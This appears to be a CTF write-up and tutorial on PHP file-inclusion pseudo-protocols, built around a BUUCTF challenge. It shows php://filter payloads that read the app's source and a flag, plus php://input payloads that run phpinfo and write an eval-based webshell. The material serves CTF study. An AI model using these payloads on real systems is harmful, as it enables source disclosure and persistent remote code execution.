【CTF】ctf中用到的php伪协议总结及例题(持续更)

news2024/9/21 4:17:28

目录

前言

关于文件包含漏洞

php伪协议总结

关于php://协议

参考自:

前言

 本篇文章使用的靶场是buuctf上的web题目:[BSidesCF 2020]Had a bad day

进行点击选项得到一个这样的url

 这里猜测存在sql注入,没测出来。或者可能有php伪协议读取

php://filter/convert.base64-encode/resource=index.php

发现后缀变为.php.php,现在改为 

php://filter/convert.base64-encode/resource=index

http://f650f9e6-2c5b-4422-bdf8-9a42ed816d99.node4.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index

php伪协议读取源码,并进行base64解码,得到源码。

<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="Images that spark joy">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <title>Had a bad day?</title>
    <link rel="stylesheet" href="css/material.min.css">
    <link rel="stylesheet" href="css/style.css">
  </head>
  <body>
    <div class="page-layout mdl-layout mdl-layout--fixed-header mdl-js-layout mdl-color--grey-100">
      <header class="page-header mdl-layout__header mdl-layout__header--scroll mdl-color--grey-100 mdl-color-text--grey-800">
        <div class="mdl-layout__header-row">
          <span class="mdl-layout-title">Had a bad day?</span>
          <div class="mdl-layout-spacer"></div>
        <div>
      </header>
      <div class="page-ribbon"></div>
      <main class="page-main mdl-layout__content">
        <div class="page-container mdl-grid">
          <div class="mdl-cell mdl-cell--2-col mdl-cell--hide-tablet mdl-cell--hide-phone"></div>
          <div class="page-content mdl-color--white mdl-shadow--4dp content mdl-color-text--grey-800 mdl-cell mdl-cell--8-col">
            <div class="page-crumbs mdl-color-text--grey-500">
            </div>
            <h3>Cheer up!</h3>
              <p>
                Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
              </p>
              <div class="page-include">
              <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>
			</div>
          <form action="index.php" method="get" id="choice">
              <center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
              <button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
          </form>

          </div>
        </div>
      </main>
    </div>
    <script src="js/material.min.js"></script>
  </body>
</html>

传入的参数必须带有woofers或者index或者meowers

/index.php?category=woofers/../flag

使用伪协议的嵌套协议

 /index.php?category=php://filter/convert.base64-encode/woofers/resource=./flag

<!-- Can you read this flag? -->
<?php
 // flag{7bc0caab-bb2c-4505-b82c-b9efdc8206bb}
?>

关于文件包含漏洞

形成原因:为了更好地使用代码的重用性,可以使用文件包含函数将文件包含进来,直接使用文件中的代码来提高重用性。但是这也产生了文件包含漏洞,产生原因是在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时用户可以对变量的值可控,而服务器端未对变量值进行合理地校验或者校验被绕过,就会导致文件包含漏洞。

分类:文件包含又分为本地文件包含和远程文件包含

本地文件包含:当包含的文件在服务器本地时,就形成了本地文件包含。文件包含可以包含任意文件,被包含的文件可以不是 PHP 代码,可以是文本或图片等。

<?php
    $file = $_GET['file'];
    include($file);
?>

远程文件包含:当包含的文件在远程服务器上时,就形成了远程文件包含,远程文件包含需要在 php.ini 中设置

allow_url_include = on(是否允许 include/require 远程文件)

allow_url_fopen = on(是否允许打开远程文件)

php伪协议总结

  • php://协议:访问各个输入/输出流
  • file://协议:访问本地文件系统
  • zip://协议:压缩流
  • phar://协议:php归档
  • http://协议:访问网站

关于php://协议

在CTF中经常使用的是php://filter和php://inputphp://filter用于读取源码,php://input用于执行php代码。

php://input:可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分

对上面用到的伪协议进行解释一下

?woofers=php://filter/read=convert.base64-encode/resource=index

解释:php://filter/ 是一种访问本地文件的协议,/read=convert.base64-encode/ 表示读取的方式是 base64 编码后,resource=index 表示目标文件为index。为什么要进行 base64 编码呢?如果不进行 base64 编码传入,index.php 就会直接执行,我们就看不到文件中的内容了。

php 协议还常用 php://input,这可以访问请求的原始数据的只读流,可以读取 POST 请求的参数。

借图:

查看phpinfo

http://127.0.0.1/include.php?file=php://input
[POST部分]
<?php phpinfo(); ?>

写入一句话

http://127.0.0.1/include.php?file=php://input
[POST部分]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

 

参考自:

CTF-WEB:PHP 伪协议 - 乌漆WhiteMoon - 博客园 (cnblogs.com)

PHP伪协议总结 - 个人文章 - SegmentFault 思否

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/196632.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

excel函数应用:如何写出IF函数多级嵌套公式

excel函数应用:如何写出IF函数多级嵌套公式

说到函数就不得不提起函数中最受欢迎的三大家族&#xff1a;求和家族、查找引用家族、逻辑家族&#xff01;&#xff01;&#xff01;没错&#xff01;今天我们要介绍的就是三大家族之一逻辑函数家族的领头人&#xff1a;IF函数——很多人难以理解IF函数的多级嵌套使用。其实&a…
阅读更多...
shell 函数详解

shell 函数详解

目录 函数 一&#xff0c;什么是函数 二&#xff0c; 函数的返回值 三&#xff0c;函数语法 示例1&#xff1a; 示例2&#xff1a; 四&#xff0c;函数的调用 示例1&#xff1a; 示例2&#xff1a; 五&#xff0c;函数库文件 六&#xff0c; 递归函数 示例1&#xf…
阅读更多...
Node.js 全局对象介绍

Node.js 全局对象介绍

在学习 Javascript 之初&#xff0c;会接触一个概念&#xff1a;JS 由三部分组成&#xff0c;DOM BOM ECMAScript。其中前两者是宿主环境&#xff0c;也就是浏览器所提供的能力。后者才是 JS 语言本身的标准。 在上篇文章《Node.js入门&#xff08;1&#xff09;&#xff1a…
阅读更多...
SpringMVC之响应

SpringMVC之响应

目录 一&#xff1a;环境准备 二&#xff1a;响应页面[了解] 三&#xff1a;返回文本数据[了解] 四&#xff1a;响应JSON数据 SpringMVC接收到请求和数据后&#xff0c;进行一些了的处理&#xff0c;当然这个处理可以是转发给Service&#xff0c;Service层再调用Dao层完成的…
阅读更多...
1月更新!EasyOps® 28+新功能“狂飙”上线~

1月更新!EasyOps® 28+新功能“狂飙”上线~

2023节后&#xff0c;我们就要“搞事情”&#xff01; 一波新功能已上线&#xff0c;快看是不是你需要的&#xff01; 持续升级优化全平台产品&#xff0c; 只为成为你数字化变革最值得信赖的合作伙伴&#xff01; 优维EasyOps全平台28新功能来了&#xff01; ↓↓↓ 1、H…
阅读更多...
Spring的后处理器之BeanFactoryPostProcessor

Spring的后处理器之BeanFactoryPostProcessor

Spring的后处理器 Spring的后处理器是Spring对外开放的重要扩展点&#xff0c;允许我们介入到Bean的整个实例化流程中来&#xff0c;以达到动态注册BeanDefinition&#xff0c;动态修改BeanDefinition&#xff0c;以及动态修改Bean的作用。Spring主要有两种后处理器&#xff1…
阅读更多...
【车载开发系列】StatusOfDTC的解析

【车载开发系列】StatusOfDTC的解析

【车载开发系列】StatusOfDTC的解析 StatusOfDTC的解析【车载开发系列】StatusOfDTC的解析StatusOfDTC概念StatusOfDTC列表StatusOfDTC状态掩码Bit 0: TestFailedBit 1: testFailedThisOperationCycleBit 2: pendingDTCBit 3: confirmedDTCBit 4: testNotCompletedSinceLastCle…
阅读更多...
【操作系统】3、内存管理

【操作系统】3、内存管理

文章目录三、内存管理3.1 内存基础3.1.1 内存管理概念3.1.2 程序装入与链接3.1.3 内存保护3.2 内存空间的分配与回收3.2.1 连续分配管理方式3.2.1.1 单一连续分配3.2.1.2 固定分区分配3.2.1.3 动态分区分配3.2.2 动态分区分配算法3.2.2.1 首次适应算法3.2.2.2 最佳适用算法3.2.…
阅读更多...
【数据库原理与SQL Server应用】Part05——表和表数据操作

【数据库原理与SQL Server应用】Part05——表和表数据操作

【数据库原理与SQL Server应用】Part05——表和表数据操作一、表概念1.1 表结构1.2 表类型1.3 数据类型二、创建表2.1 管理工具界面方式创建表2.2 命令行方式创建表三、修改表3.1 管理工具界面方式修改表3.2 命令行方式修改表四、删除表五、表数据操作5.1 管理工具界面方式操作…
阅读更多...
怎么快速选择出色的香港服务器

怎么快速选择出色的香港服务器

相信一些大规模企业或站长都不满足于普通的香港VPS&#xff0c;虽然它也拥有很不错的性能与速度&#xff0c;但远远比不上香港服务器。但是&#xff0c;对于初次使用香港服务器的用户来说&#xff0c;选择起来肯定是要经过一番考虑的&#xff0c;那么&#xff0c;有没有什么简单…
阅读更多...
电子词典项目

电子词典项目

16. 电子词典项目需求 项目要求&#xff1a; 登录注册功能&#xff0c;不能重复登录&#xff0c;重复注册单词查询功能历史记录功能&#xff0c;存储单词&#xff0c;意思&#xff0c;以及查询时间基于TCP&#xff0c;支持多客户端连接采用数据库保存用户信息与历史记录将dic…
阅读更多...
VS2022离线安装教程

VS2022离线安装教程

官方教程下载和安装步骤 https://docs.microsoft.com/zh-cn/visualstudio/install/create-an-offline-installation-of-visual-studio?viewvs-2022 使用命令行创建本地布局 下载所需的 Visual Studio 版本的引导程序&#xff0c;并将其复制到要用作本地布局源位置的目录中。…
阅读更多...
训练自己的GPT2模型(中文),踩坑与经验

训练自己的GPT2模型(中文),踩坑与经验

GPT2与Bert、T5之类的模型很不一样&#xff01;&#xff01;&#xff01; 如果你对Bert、T5、BART的训练已经很熟悉&#xff0c;想要训练中文GPT模型&#xff0c;务必了解以下区别&#xff01;&#xff01;&#xff01; 官方文档里虽然已经有教程&#xff0c;但是都是英文&…
阅读更多...
手撸低代码平台搭建(四)组件拖动自由布局的实现

手撸低代码平台搭建(四)组件拖动自由布局的实现

前言 大家好,在前两篇文章中,我们走进了前端低代码的世界,并揭秘了低代码的核心——页面设计器的实现。在揭秘页面设计器时,我们重点分享了顺序排列布局的组件拖动方式,那篇文章的评论中,有小伙伴问到自由布局的实现,那么我们在这篇文章中来分享一下自由布局拖动的实现…
阅读更多...
Echarts柱形头部圆弧处理

Echarts柱形头部圆弧处理

第008个点击查看专栏目录对于柱状图来说&#xff0c;我们想要的效果是圆柱的上面进行圆弧的处理&#xff0c;产生顺滑的感觉&#xff0c;怎么处理呢&#xff0c;只要设置好样式即可&#xff0c;参考源代码圆角半径&#xff0c;单位px&#xff0c;支持传入数组分别指定 4 个圆角…
阅读更多...
VMware 多站点容灾之SRM部署实践

VMware 多站点容灾之SRM部署实践

一、背景 在VMware 多云场景中&#xff0c;我们最初会通过vmware的副本机制手动克隆或主从模式完成一些节点的灾备&#xff0c;虽然在初期不会出现什么问题&#xff0c;但一旦出现灾备恢复的复杂度和数据丢失风险还是一大考验&#xff0c;基于此&#xff0c;我们可借助VMware v…
阅读更多...
Qt 获取网络信息

Qt 获取网络信息

在Qt Network模块中使用QHostAddress存放IP地址&#xff0c;QHostInfo类来获取主机名和IP。 进行TCP/UDP编程时&#xff0c;需要将连接的主机名解析为IP地址&#xff0c;这个操作用DNS协议执行。 在互联网中现在有两种IP类型&#xff1a;IVP4和IVP6。 IP地址是给每一个连接在互…
阅读更多...
Linux操作系统之基础IO

Linux操作系统之基础IO

目录 系统IO调用接口 open write read 理解文件描述符fd 理解Linux操作系统的设计哲学&#xff0c;多态的思想是如何应用在Linux文件系统的 输出&#xff0c;追加&#xff0c;输入重定向的本质 子进程共享父进程的文件 IO的两个缓冲区 Linux特有的EXT文件系统 磁盘系…
阅读更多...
代码训练营第二十天|530.二叉搜索树的最小绝对差 ● 501.二叉搜索树中的众数 ● 236. 二叉树的最近公共祖先

代码训练营第二十天|530.二叉搜索树的最小绝对差 ● 501.二叉搜索树中的众数 ● 236. 二叉树的最近公共祖先

530 .二叉搜索树的最小绝对差 看完题后的思路 因为是二叉搜索树&#xff0c;所以直接按照二叉搜索树中序遍历&#xff0c;得到递增序列。遍历过程中一个指针指向遍历过的前一个元素 prenull&#xff1b; void f&#xff08;root&#xff09;if rootnull return递归 f&#x…
阅读更多...
git语义化定制版本规范

git语义化定制版本规范

目录说明说明 语义化版本控制规范,语义化的版本控制规范要求版本号由三部分构成&#xff1a;x.y.z MAJOR&#xff08;X&#xff09;&#xff1a;这个是主版本号&#xff0c;一般是涉及到不兼容的 API 更改时&#xff0c;这个会变化。MINOR&#xff08;Y&#xff09;&#xff…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023